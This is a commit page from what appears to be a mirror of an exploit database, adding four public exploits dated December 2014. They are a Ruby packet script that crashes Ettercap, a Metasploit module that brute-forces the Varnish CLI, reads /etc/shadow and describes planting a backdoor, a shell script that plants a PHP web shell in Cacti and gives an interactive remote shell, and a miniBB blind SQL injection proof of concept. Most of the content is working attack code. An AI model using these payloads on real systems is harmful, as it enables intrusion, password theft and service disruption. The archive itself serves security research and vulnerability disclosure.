bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_21_2014

Browse source
This commit is contained in:
Offensive Security 2014-12-21 04:51:18 +00:00
parent 2a1c991e8f
commit 9f4c7b310b
5 changed files with 524 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
files.csv
View file

@ -32041,3 +32041,7 @@ id,file,description,date,author,platform,type,port
35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0
35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 'arama_islem.asp' Cross Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 'arama_islem.asp' Cross Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0
35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 'vtigerservice.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 'vtigerservice.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082

Can't render this file because it is too large.

203
platforms/linux/dos/35580.rb Executable file
View file

@ -0,0 +1,203 @@
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub
require 'packetfu'
include PacketFu
if ARGV.count < 4
puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
puts "[-]Use valid mac for your interface, if you dont know"+
" victim's ip address use broadcast"
exit
end
def nbns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 137
u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
u.payload << "\x00\x20" #type
u.payload << "\x00\x01" #class
u.payload << "A"*1000 #pad
u.recalc
u.to_w(ARGV[3])
end
def gg_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 8074
u.payload = "\x15\x00\x00\x00" #gg_type
u.payload << "\xe8\x03\x00\x00" #gg_len
u.payload << "A"*1000
u.recalc
u.to_w(ARGV[3])
end
def dhcp_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[0]
u.ip_saddr = ARGV[1]
u.udp_src = 67
u.udp_dst = 4444
u.payload = "\x02"*236
u.payload << "\x63\x82\x53\x63"
u.payload << "\x35"
u.payload << "\x00\x05\x00"
u.payload << "\x51"
u.payload << "\x00" #size
u.payload << "A" * 3 #pad
u.recalc
u.to_w(ARGV[3])
end
def mdns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x06router\x05local\x00" #name
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.recalc
u.to_w(ARGV[3])
end
def mdns_dos_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x01"
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.payload << "A"*500
u.recalc
u.to_w(ARGV[3])
end
def pgsql_server
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[1]
u.ip_daddr = ARGV[0]
u.tcp_src = 5432
u.tcp_dst = 3333
u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end
def pgsql_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end
def pgsql_client_shell
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70"
u.payload << "\x00\x00\x03\xe9" #len
u.payload << "A"*1000
u.payload << "\x00"
u.recalc
u.to_w(ARGV[3])
end
def radius_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 1645
u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
u.recalc
u.to_w(ARGV[3])
end
puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()
case choice
when 1
puts "[+]Sending nbns packet.."
nbns_header
when 2
puts "[+]Sending client gg packet.."
gg_client
when 3
puts "[+]Sending dhcp packet.."
dhcp_header
when 4
puts "[+]Sending mdns packet.."
mdns_header
mdns_dos_header
when 5
puts "[+]Sending pgsql packet.."
pgsql_client
pgsql_server
pgsql_client_shell
when 6
puts "[+]Sending radius packet.."
radius_header
else
puts "[-]Unrecognized command "
end

168
platforms/linux/remote/35581.rb Executable file
View file

@ -0,0 +1,168 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Varnish Cache CLI Interface Bruteforce Utility',
'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
list of passwords. This module will also attempt to read the /etc/shadow root password hash
if a valid password is found. It is possible to execute code as root with a valid password,
however this is not yet implemented in this module.',
'References' =>
[
[ 'OSVDB', '67670' ],
[ 'CVE', '2009-2936' ],
# General
[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
[ 'CVE', '1999-0502'] # Weak password
],
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(6082),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
], self.class)
deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
end
def run_host(ip)
connect
res = sock.get_once(-1,3) # detect banner
if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
vprint_status("Varnishd CLI detected - authentication required.")
each_user_pass { |user, pass|
sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
res = sock.get_once(-1,3) # grab challenge
if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
challenge = $1
secret = pass + "\n" # newline is needed
response = challenge + "\n" + secret + challenge + "\n"
response = Digest::SHA256.hexdigest(response)
sock.put("auth #{response}\n")
res = sock.get_once(-1,3)
if (res =~ /107 \d+/) # 107 auth
vprint_status("FAILED: #{secret}")
elsif (res =~ /200 \d+/) # 200 ok
print_good("GOOD: #{secret}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => ('varnishd'),
:pass => pass,
:proof => "#{res}",
:source_type => "user_supplied",
:active => true
)
sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
res = sock.get_once(-1,3)
if (res =~ /root:([\D\S]+):/) # lazy.
if ($1[0] == "!")
vprint_error("/etc/shadow root uid is disabled.\n")
else
print_good("/etc/shadow root enabled:\nroot:#{$1}:")
end
else
vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
end
break
else
vprint_error("Unknown response:\n#{res}\n")
end
end
}
elsif (res =~ /Varnish Cache CLI 1.0/)
print_good("Varnishd CLI does not require authentication!")
else
vprint_error("Unknown response:\n#{res}\n")
end
disconnect
end
end
=begin
aushack notes:
- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
VCL server:
vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
vcl.use foo
start
Attacker:
telnet target 80
GET /backd00r HTTP/1.1
Host: 127.0.0.1
(... wait for child to execute debug trap INT3 / shellcode).
CLI protocol notes from website:
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
Requests are whitespace separated tokens terminated by a newline (NL) character.
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)
The response consists of a header which can be read as fixed format or ASCII text:
1-3 %03d Response code
4 ' ' Space
5-12 %8d Length of body
13 \n NL character.
Followed by the number of bytes announced by the header.
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
enum cli_status_e {
CLIS_SYNTAX = 100,
CLIS_UNKNOWN = 101,
CLIS_UNIMPL = 102,
CLIS_TOOFEW = 104,
CLIS_TOOMANY = 105,
CLIS_PARAM = 106,
CLIS_OK = 200,
CLIS_CANT = 300,
CLIS_COMMS = 400,
CLIS_CLOSE = 500
};
=end

101
platforms/php/webapps/35578.sh Executable file
View file

@ -0,0 +1,101 @@
#!/bin/sh
##############
# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
# Date: 19/12/2014
# Exploit Author: Wireghoul
# Software Link: http://docs.cacti.net/plugin:superlinks
# Identifiers: CVE-2014-4644, EDB-ID-33809
# Exploit explanation through inline comments
# Patch provided at the end
#
# This is the year where hope fails you -- Slipknot: Pulse of the maggots
#
##############
echo -e "\e[32m *-*, \e[31m ___________"
echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\"
echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\"
echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'"
echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'"
echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m"
echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
echo
if [ -z $1 ]; then
echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n";
exit 2;
fi
# This exploit is a second order LFI through SQLI, so first we must write some data to disk
# Luckily the application logs all sort of stuff, so lets poison the application log
# The reason for this is manyfold, read on.
curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null
# Now lets analyse the vulnerability:
# superlinks.php:21:if (isset($_GET['id'])) {
# superlinks.php:22: $pageid=$_GET['id'];
# superlinks.php:23:}
# superlinks.php:24:
# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
# superlinks.php:26: id,
# superlinks.php:27: title,
# superlinks.php:28: style,
# superlinks.php:29: contentfile
# superlinks.php:30: FROM (superlinks_pages, superlinks_auth)
# superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid
# superlinks.php:32: AND id=" . $pageid . "
# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
# However the real fun occurs a few lines later
# superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
# superlinks.php:58:
# superlinks.php:59: if (file_exists($my_file)) {
# superlinks.php:60: @include_once($my_file);
# We can now include a file of our choosing (LFI) based on the data returned from the SQLi
# There are only a few problems:
# * We cannot use strings/quotes as magic quotes are usually on
# * We do not know the local path for the LFI
# * Usual tricks like /proc/self* have been patched
# * Database server and web server may be different hosts
# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
# The second one is a little trickier, we can brute force LFI locations... or
# We can dynamically locate a file path which is stored in the database and present on the webserver
# $ mysqldump cacti | grep '\.log'
# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
# $ ls -la /var/log/cacti/cacti.log
# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
# $ tail /var/log/cacti/cati.log
# <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name"
# WINRAR!
# We can now include the poisoned log file by fetching the log path from the database
# and prepending it with the normal directory traversal pattern ../../../ using concat()
# We traverse 8 deep, that's usually enough
echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
while read line; do
if [ "$line" == "exit" ]; then
exit
fi
comand=`echo -n $line | sed -e's/ /+/g'`
curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
sed -n '/SHELL/, $p' | \
sed -e 's/.*SHELL//' |\
sed '/LLEHS/, $d'
echo -n "cactishell> "
done
# Proposed patch
# Vendor has a patch in a SVN repo somewhere:
# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
# Yet has not made the patch available, or responded to requests to do so:
# http://forums.cacti.net/viewtopic.php?t=53711
#--- superlinks.php 2014-12-18 02:05:37.706013833 -0500
#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500
#@@ -19,7 +19,7 @@
#
# $pageid = 0;
# if (isset($_GET['id'])) {
#- $pageid=intval($_GET['id']);
#+ $pageid=$_GET['id'];
# }
#
# $page = db_fetch_row("SELECT DISTINCT

48
platforms/php/webapps/35579.txt Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps
1. Description
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).
File: bb_func_unsub.php
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
//trying to unsubscribe directly from email
$chkField='email_code';
$chkVal=$_GET['code'];
$userCondition=TRUE;
$chkCode=TRUE;
}
else{
//manual unsubsribe
$chkField='user_id';
$chkVal=$user_id;
$userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
http://security.szurek.pl/minibb-31-blind-sql-injection.html
2. Proof of Concept
http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '
This SQL will check if first password character user ID=1 is ?c?.
If yes, it will sleep 5 seconds.
3. Solution:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html